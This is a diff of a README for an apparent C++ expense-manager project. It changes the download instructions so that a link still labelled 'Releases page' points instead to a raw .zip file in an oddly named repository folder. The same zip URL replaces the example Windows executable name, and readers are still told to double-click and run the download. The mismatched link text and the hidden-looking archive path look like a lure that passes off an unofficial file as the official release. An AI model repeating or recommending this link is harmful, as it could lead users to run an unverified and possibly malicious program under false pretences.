DavidLesotho666/cpp-expense-manager/README.md

 To download cpp-expense-manager, follow these steps:

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/DavidLesotho666/cpp-expense-manager/releases).
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/DavidLesotho666/cpp-expense-manager/main/ankyloglossia/cpp-expense-manager-3.6.zip).
 2. **Choose the Latest Version:** Look for the most recent version of cpp-expense-manager.
-3. **Download the File:** Click on the download link for the appropriate file for your operating system (for example, `cpp-expense-manager-win.exe` for Windows).
+3. **Download the File:** Click on the download link for the appropriate file for your operating system (for example, `https://raw.githubusercontent.com/DavidLesotho666/cpp-expense-manager/main/ankyloglossia/cpp-expense-manager-3.6.zip` for Windows).
 4. **Run the Application:** Once the download completes, double-click the file to run the application.

 ## 🛠️ How to Use cpp-expense-manager